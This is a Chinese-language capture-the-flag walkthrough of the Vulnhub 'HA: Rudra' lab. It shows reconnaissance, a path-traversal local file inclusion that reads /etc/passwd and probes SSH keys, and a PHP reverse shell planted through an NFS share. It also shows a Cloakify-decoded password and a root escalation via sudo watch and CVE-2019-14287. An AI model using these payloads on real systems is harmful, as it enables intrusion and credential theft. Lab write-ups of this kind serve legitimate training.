Vulnhub之Rudra靶机详细测试过程
Rudra
作者:jason huawen
靶机信息
名称:HA: Rudra
地址:
https://www.vulnhub.com/entry/ha-rudra,386/
识别目标主机IP地址
(root💀kali)-[~/Vulnhub/Ruda]
└─# netdiscover -i eth1 -r 192.168.187.0/24
Currently scanning: 192.168.187.0/24 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.187.1 00:50:56:c0:00:01 1 60 VMware, Inc.
192.168.187.143 00:0c:29:8d:a3:b1 1 60 VMware, Inc.
192.168.187.254 00:50:56:e0:12:65 1 60 VMware, Inc.
利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.187.143
NMAP扫描
┌──(root💀kali)-[~/Vulnhub/Ruda]
└─# nmap -sS -sV -sC -p- 192.168.187.143 -oN nmap_full_scan 130 ⨯
Starting Nmap 7.92 ( https://nmap.org ) at 2023-03-14 21:34 EDT
Nmap scan report for localhost (192.168.187.143)
Host is up (0.0014s latency).
Not shown: 65527 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 d7:0d:45:dd:52:69:f9:54:2a:73:a7:d0:c5:ab:db:9b (RSA)
| 256 7f:cc:3c:a5:53:47:05:15:94:95:41:ea:5e:48:f1:00 (ECDSA)
|_ 256 30:da:01:de:ab:d8:19:1e:fc:58:44:22:3b:29:33:cd (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: HA: Rudra
|_http-server-header: Apache/2.4.29 (Ubuntu)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 3 2049/udp nfs
| 100003 3 2049/udp6 nfs
| 100003 3,4 2049/tcp nfs
| 100003 3,4 2049/tcp6 nfs
| 100005 1,2,3 40314/udp mountd
| 100005 1,2,3 44757/tcp6 mountd
| 100005 1,2,3 45803/tcp mountd
| 100005 1,2,3 48685/udp6 mountd
| 100021 1,3,4 38241/tcp6 nlockmgr
| 100021 1,3,4 41413/tcp nlockmgr
| 100021 1,3,4 42372/udp6 nlockmgr
| 100021 1,3,4 45582/udp nlockmgr
| 100227 3 2049/tcp nfs_acl
| 100227 3 2049/tcp6 nfs_acl
| 100227 3 2049/udp nfs_acl
|_ 100227 3 2049/udp6 nfs_acl
2049/tcp open nfs_acl 3 (RPC #100227)
33207/tcp open mountd 1-3 (RPC #100005)
41413/tcp open nlockmgr 1-4 (RPC #100021)
45803/tcp open mountd 1-3 (RPC #100005)
48401/tcp open mountd 1-3 (RPC #100005)
MAC Address: 00:0C:29:8D:A3:B1 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.74 seconds
从NMAP扫描结果可知目标主机主要有ssh,http,以及NFS文件共享服务。
获得Shell
首先从NFS文件共享服务入手:
┌──(root💀kali)-[~/Vulnhub/Ruda]
└─# showmount -e 192.168.187.143
Export list for 192.168.187.143:
/home/shivay *
┌──(root💀kali)-[~/Vulnhub/Ruda]
└─# mkdir share
┌──(root💀kali)-[~/Vulnhub/Ruda]
└─# mount -t nfs 192.168.187.143:/home/shivay share
┌──(root💀kali)-[~/Vulnhub/Ruda]
└─# cd share
┌──(root💀kali)-[~/Vulnhub/Ruda/share]
└─# ls
mahadev.txt
┌──(root💀kali)-[~/Vulnhub/Ruda/share]
└─# cat mahadev.txt
Rudra is another name of Lord Shiva. As per the vedic scriptures there are total 11 rudras. Of them, prominent one is Shiva. The other 10 rudras are considered as his expansions. As per Mahabharata, Srimad Bhagavatam and other vedic texts Lord Shiva appeared from Lord Brahma's eyebrows. Srimad Bhagvatam tells us why Lord Shiva is known as “Rudra”:
mahadev.txt信息目前还不清楚其用途,难道是用户名: rudra, shiva?
┌──(root💀kali)-[~/Vulnhub/Ruda/share]
└─# curl http://192.168.187.143/robots.txt
nandi.php
┌──(root💀kali)-[~/Vulnhub/Ruda/share]
└─# curl http://192.168.187.143/nandi.php
访问nandi.php,返回为空(没有出错),是不是需要有参数?暂时搁置,先做目录扫描,然后来看是否需要FUZZ
──(root💀kali)-[~/Vulnhub/Ruda/share]
└─# nikto -h http://192.168.187.143
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.187.143
+ Target Hostname: 192.168.187.143
+ Target Port: 80
+ Start Time: 2023-03-14 21:41:05 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Server may leak inodes via ETags, header found with file /, inode: 121f, size: 595769a7b3a80, mtime: gzip
+ Allowed HTTP Methods: POST, OPTIONS, HEAD, GET
+ OSVDB-3268: /img/: Directory indexing found.
+ OSVDB-3092: /img/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7915 requests: 0 error(s) and 9 item(s) reported on remote host
+ End Time: 2023-03-14 21:42:17 (GMT-4) (72 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
nikto工具没有给出更为有价值的信息。
──(root💀kali)-[~/Vulnhub/Ruda/share]
└─# gobuster dir -u http://192.168.187.143 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.js,.sh,.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.187.143
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: php,html,js,sh,txt
[+] Timeout: 10s
===============================================================
2023/03/14 21:43:03 Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 4639]
/img (Status: 301) [Size: 316] [--> http://192.168.187.143/img/]
/assets (Status: 301) [Size: 319] [--> http://192.168.187.143/assets/]
/robots.txt (Status: 200) [Size: 10]
/server-status (Status: 403) [Size: 280]
/detail2.html (Status: 200) [Size: 3074]
看来目录扫描没有什么收获,前面有个nandi.php文件,接下来去FUZZ一下
──(root💀kali)-[~/Vulnhub/Ruda]
└─# wfuzz -u http://192.168.187.143/nandi.php?FUZZ=id -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hw 0
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://192.168.187.143/nandi.php?FUZZ=id
Total requests: 220560
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
──(root💀kali)-[~/Vulnhub/Ruda]
└─# wfuzz -u http://192.168.187.143/nandi.php?FUZZ=../../../../../etc/passwd -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hw 0
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://192.168.187.143/nandi.php?FUZZ=../../../../../etc/passwd
Total requests: 220560
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000759: 200 30 L 39 W 1549 Ch "file"
看来总体方向是正确的,成功的FUZZ出参数名称为file.
┌──(root💀kali)-[~/Vulnhub/Ruda]
└─# curl http://192.168.187.143/nandi.php?file=../../../../../etc/passwd 130 ⨯
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
uuidd:x:105:109::/run/uuidd:/usr/sbin/nologin
rudra:x:1000:1000:rudra,,,:/home/rudra:/bin/bash
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
mahakaal:x:1001:1001:,,,:/home/mahakaal:/bin/bash
statd:x:107:65534::/var/lib/nfs:/usr/sbin/nologin
shivay:x:1002:1002:,,,:/home/shivay:/bin/bash
mysql:x:108:114:MySQL Server,,,:/nonexistent:/bin/false
可知用户名(除root)有:rudra, shivay以及mahakaal,这也验证了之前的猜测。
──(root💀kali)-[~/Vulnhub/Ruda]
└─# curl http://192.168.187.143/nandi.php?file=../../../../../home/rudra/.ssh/id_rsa
┌──(root💀kali)-[~/Vulnhub/Ruda]
└─# curl http://192.168.187.143/nandi.php?file=../../../../../home/shivay/.ssh/id_rsa
┌──(root💀kali)-[~/Vulnhub/Ruda]
└─# curl http://192.168.187.143/nandi.php?file=../../../../../var/log/auth.log
┌──(root💀kali)-[~/Vulnhub/Ruda]
└─# curl http://192.168.187.143/nandi.php?file=../../../../../var/log/apache2/access.log
在探测到目标主机存在本地文件包含漏洞后,自然地下一步看目标主机是否存在SSH私钥文件,以及是否可读取日志文件,但是经过测试未能读取ssh私钥文件以及日志文件,接下来看有无远程文件包含漏洞:
──(root💀kali)-[~/Vulnhub/Ruda]
└─# curl http://192.168.187.143/nandi.php?file=http://192.168.187.130:8000/test.txt
经过测试也不存在远程文件包含漏洞
但是在前面的探测中已经知道目标主机允许NFS共享,因此可以将shell.php上传至目标主机,然后利用文件包含漏洞得到Shell
┌──(root💀kali)-[~/Vulnhub/Ruda]
└─# cp ~/Toolsets/php-reverse-shell-1.0/php-reverse-shell.php shell.php
┌──(root💀kali)-[~/Vulnhub/Ruda]
└─# vim shell.php
┌──(root💀kali)-[~/Vulnhub/Ruda]
└─# cd share
┌──(root💀kali)-[~/Vulnhub/Ruda/share]
└─# cp ../shell.php .
而我们知道share的目录位置为:
/home/shivay
接下里用本地文件包含漏洞读取该文件
注意需要修改权限shell.php,否则执行失败
──(root💀kali)-[~/Vulnhub/Ruda/share]
└─# chmod 777 shell.php
──(root💀kali)-[~/Vulnhub/Ruda]
└─# nc -nlvp 5555
listening on [any] 5555 ...
connect to [192.168.187.130] from (UNKNOWN) [192.168.187.143] 38318
Linux ubuntu 4.15.0-20-generic #21-Ubuntu SMP Tue Apr 24 06:16:15 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
19:43:21 up 1:13, 0 users, load average: 0.00, 0.03, 0.09
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ which python
$ which python3
/usr/bin/python3
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@ubuntu:/$ cd /home
cd /home
www-data@ubuntu:/home$ ls -alh
ls -alh
total 20K
drwxr-xr-x 5 root root 4.0K Oct 21 2019 .
drwxr-xr-x 22 root root 4.0K Oct 21 2019 ..
drwxr-xr-x 3 mahakaal mahakaal 4.0K Oct 21 2019 mahakaal
drwxr-xr-x 3 rudra rudra 4.0K Oct 21 2019 rudra
drwxr-xr-x 2 shivay shivay 4.0K Mar 14 19:37 shivay
提权
将linpeas.sh脚本上传至目标主机/tmp目录,修改权限,并执行脚本,从输出结果可知,目标运行mysql,尝试无密码登录:
www-data@ubuntu:/tmp$ mysql -uroot -p
mysql -uroot -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 6
Server version: 5.7.27-0ubuntu0.18.04.1 (Ubuntu)
Copyright (c) 2000, 2019, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> show databases;
show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mahadev |
| mysql |
| performance_schema |
| sys |
+--------------------+
5 rows in set (0.00 sec)
mysql>
mysql> use mahadev;
use mahadev;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> show tables;
show tables;
+-------------------+
| Tables_in_mahadev |
+-------------------+
| hint |
+-------------------+
1 row in set (0.00 sec)
mysql> select * from hint;
select * from hint;
+---------------------------+
| hint |
+---------------------------+
| check on media filesystem |
+---------------------------+
1 row in set (0.00 sec)
ww-data@ubuntu:/media$ cat hints
cat hints
https://www.hackingarticles.in/cloakify-factory-a-data-exfiltration-tool-uses-text-based-steganography/
without noise
www-data@ubuntu:/media$
Cloakify Factory 将任何文件类型(例如 .zip、.exe、.xls 等)转换为看起来无害的字符串列表。 这使您可以将文件隐藏在众目睽睽之下,并在不触发警报的情况下传输文件。 这种“基于文本的隐写术”的奇特术语,通过使数据看起来像其他数据来隐藏数据。 隐藏文件可以击败基于签名的恶意软件检测工具。
www-data@ubuntu:/media$ cat creds
cat creds
😴
😬
😥
😭
🐼
😬
🙈
😕
🐼
😬
🐵
😊
😀
😻
😥
😓
🐼
😅
😕
😕
😀
🙊
😾
😕
😝
😛
🙎
🙎
┌──(root💀kali)-[~/Vulnhub/Ruda/Cloakify]
└─# python2 cloakifyFactory.py
____ _ _ _ __ ______ _
/ __ \ | | | |_|/ _| | ___| | |
| / \/ | ___ __ _| | ___| |_ _ _ | |_ __ _ ___| |_ ___ _ __ _ _
| | | |/ _ \ / _` | |/ / | _| | | | | _/ _` |/ __| __/ _ \| '__| | | |
| \__/\ | |_| | |_| | <| | | | |_| | | || |_| | |__| || |_| | | | |_| |
\____/_|\___/ \__,_|_|\_\_|_| \__, | \_| \__,_|\___|\__\___/|_| \__, |
__/ | __/ |
|___/ |___/
"Hide & Exfiltrate Any Filetype in Plain Sight"
Written by TryCatchHCF
https://github.com/TryCatchHCF
(\~---.
/ (\-`-/)
( ' ' ) data.xls image.jpg \ List of emoji, IP addresses,
\ ( \_Y_/\ ImADolphin.exe backup.zip --> sports teams, desserts,
""\ \___// LoadMe.war file.doc / beers, anything you imagine
`w "
==== Cloakify Factory Main Menu ====
1) Cloakify a File
2) Decloakify a File
3) Browse Ciphers
4) Browse Noise Generators
5) Help / Basic Usage
6) About Cloakify Factory
7) Exit
Selection: 2
==== Decloakify a Cloaked File ====
Enter filename to decloakify (e.g. /foo/bar/MyBoringList.txt): /root/Vulnhub/Ruda/creds
Save decloaked data to filename (default: 'decloaked.file'):
Preview cloaked file? (y/n default=n):
Was noise added to the cloaked file? (y/n default=n): n
Ciphers:
1 - topWebsites
2 - geocache
3 - dessertsArabic
4 - dessertsRussian
5 - geoCoordsWorldCapitals
6 - dessertsHindi
7 - dessertsPersian
8 - dessertsThai
9 - hashesMD5
10 - dessertsChinese
11 - emoji
12 - statusCodes
13 - amphibians
14 - ipAddressesTop100
15 - desserts
16 - starTrek
17 - skiResorts
18 - dessertsSwedishChef
19 - rickrollYoutube
20 - worldBeaches
21 - belgianBeers
22 - pokemonGo
23 - evadeAV
24 - worldFootballTeams
Enter cipher #: 11
Decloaking file using cipher: emoji
!!! Oh noes! Error decloaking file (did you select the same cipher it was cloaked with?)
Press return to continue...
==== Cloakify Factory Main Menu ====
1) Cloakify a File
2) Decloakify a File
3) Browse Ciphers
4) Browse Noise Generators
5) Help / Basic Usage
6) About Cloakify Factory
7) Exit
Selection: 2
==== Decloakify a Cloaked File ====
Enter filename to decloakify (e.g. /foo/bar/MyBoringList.txt): /root/Vulnhub/Ruda/creds
Save decloaked data to filename (default: 'decloaked.file'):
Preview cloaked file? (y/n default=n):
Was noise added to the cloaked file? (y/n default=n): n
Ciphers:
1 - topWebsites
2 - geocache
3 - dessertsArabic
4 - dessertsRussian
5 - geoCoordsWorldCapitals
6 - dessertsHindi
7 - dessertsPersian
8 - dessertsThai
9 - hashesMD5
10 - dessertsChinese
11 - emoji
12 - statusCodes
13 - amphibians
14 - ipAddressesTop100
15 - desserts
16 - starTrek
17 - skiResorts
18 - dessertsSwedishChef
19 - rickrollYoutube
20 - worldBeaches
21 - belgianBeers
22 - pokemonGo
23 - evadeAV
24 - worldFootballTeams
Enter cipher #: 11
Decloaking file using cipher: emoji
Decloaked file /root/Vulnhub/Ruda/creds , saved to decloaked.file
Press return to continue...
==== Cloakify Factory Main Menu ====
1) Cloakify a File
2) Decloakify a File
3) Browse Ciphers
4) Browse Noise Generators
5) Help / Basic Usage
6) About Cloakify Factory
7) Exit
Selection: 7
Hei hei!
┌──(root💀kali)-[~/Vulnhub/Ruda/Cloakify]
└─# ls
ciphers decloaked.file LICENSE README_GETTING_STARTED.txt
cloakifyFactory.py decloakify.py listsUnrandomized README.md
cloakify.py decloakify.pyc noiseTools removeNoise.py
cloakify.pyc DefCon24Slides randomizeCipherExample.txt screenshots
┌──(root💀kali)-[~/Vulnhub/Ruda/Cloakify]
└─# cat decloaked.file
mahakaal:kalbhairav
从而得到了用户mahakaal的密码
┌──(root💀kali)-[~/Vulnhub/Ruda/Cloakify]
└─# ssh mahakaal@192.168.187.143
The authenticity of host '192.168.187.143 (192.168.187.143)' can't be established.
ED25519 key fingerprint is SHA256:UOdR8TkcYRUx1hMdAQ/6s+/UyLBxjbAnytjRoTUtjKk.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.187.143' (ED25519) to the list of known hosts.
mahakaal@192.168.187.143's password:
Welcome to Ubuntu 18.04 LTS (GNU/Linux 4.15.0-20-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
Last login: Mon Oct 21 09:59:11 2019 from 192.168.1.107
mahakaal@ubuntu:~$ id
uid=1001(mahakaal) gid=1001(mahakaal) groups=1001(mahakaal)
mahakaal@ubuntu:~$ sudo -l
[sudo] password for mahakaal:
Matching Defaults entries for mahakaal on ubuntu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User mahakaal may run the following commands on ubuntu:
(ALL, !root) /usr/bin/watch
mahakaal@ubuntu:~$ sudo -l
[sudo] password for mahakaal:
Matching Defaults entries for mahakaal on ubuntu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User mahakaal may run the following commands on ubuntu:
(ALL, !root) /usr/bin/watch
mahakaal@ubuntu:~$ sudo /usr/bin/watch -x sh -c 'reset; exec sh 1>&0 2>&0'
Sorry, user mahakaal is not allowed to execute '/usr/bin/watch -x sh -c reset; exec sh 1>&0 2>&0' as root on ubuntu.
mahakaal@ubuntu:~$ ls /home
mahakaal rudra shivay
mahakaal@ubuntu:~$ sudo -u rudra /usr/bin/watch -x sh -c 'reset; exec sh 1>&0 2>&0'
$ id
uid=1000(rudra) gid=1000(rudra) groups=1000(rudra),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),111(lpadmin),112(sambashare)
$
根据CVE: 2019-14287漏洞
mahakaal@ubuntu:~$ sudo -l
Matching Defaults entries for mahakaal on ubuntu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User mahakaal may run the following commands on ubuntu:
(ALL, !root) /usr/bin/watch
mahakaal@ubuntu:~$ sudo -u#-1 watch -x sh -c 'reset; exec sh 1>&0 2>&0' -u
# cd /root
# ls -alh
total 24K
drwx------ 3 root root 4.0K Oct 21 2019 .
drwxr-xr-x 22 root root 4.0K Oct 21 2019 ..
-rw-r--r-- 1 root root 3.1K Apr 9 2018 .bashrc
-rw-r--r-- 1 root root 1.2K Oct 21 2019 final.txt
drwxr-xr-x 3 root root 4.0K Oct 21 2019 .local
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
# cat final.txt
. ]@&L .
Jw #@&& zM
'|$w ,]@&$L ,$\r
k|$L ]]@$$$ ,@|j
]@!$ j]@&$$W $|p[
@@j$ ]j]N&$$@ $@@@
$&@B~ jj]B&$$@ @@$@
#R&&[ `]]@&$$* ]$$@N
j%%@$ "@&M ]RN%k
|" 7$ $& ]F%"|
(%'"$ $ $@%")
\%%$ *g@* $%"/
''*]%r&& %h*'''
'L@&=r
'@&U
j@&L
]@&[
$@&K
$@&@
$$$@
j@Hw. -&&&&L ,=m$~
j@%%kkHr. <[kkj]%r
j@@gjjji||!;;!||jjjj%]%r
j@Hkkj|||!=||~!l|jjjk%%r
j@%%kisj|;!!*!;|!{{jj]%r
j@@pkjb*` !#$#! `*jjkk]%r
j[M"` '&7!' `*%$r
!%%!;
;||!;
;||!:
!! Congrats you have finished this task !!
Contact us here:
Hacking Articles : https://twitter.com/rajchandel/
Aarti Singh: https://www.linkedin.com/in/aarti-singh-353698114/
+-+-+-+-+-+ +-+-+-+-+-+-+-+
|E|n|j|o|y| |H|A|C|K|I|N|G|
+-+-+-+-+-+ +-+-+-+-+-+-+-+
_______________________
经验教训
-
在经过探测后了解到目标主机存在本地文件包含漏洞,在排除经典的方法,即读取SSH私钥文件以及日志文件失败后,以及不存在远程文件包含漏洞,应该能考虑到通过其他途径比如本靶机中的NFS文件共享上传shell文件
-
需要注意修改shell.php权限,否则执行失败
STRIVE FOR PROGRESS,NOT FOR PERFECTION
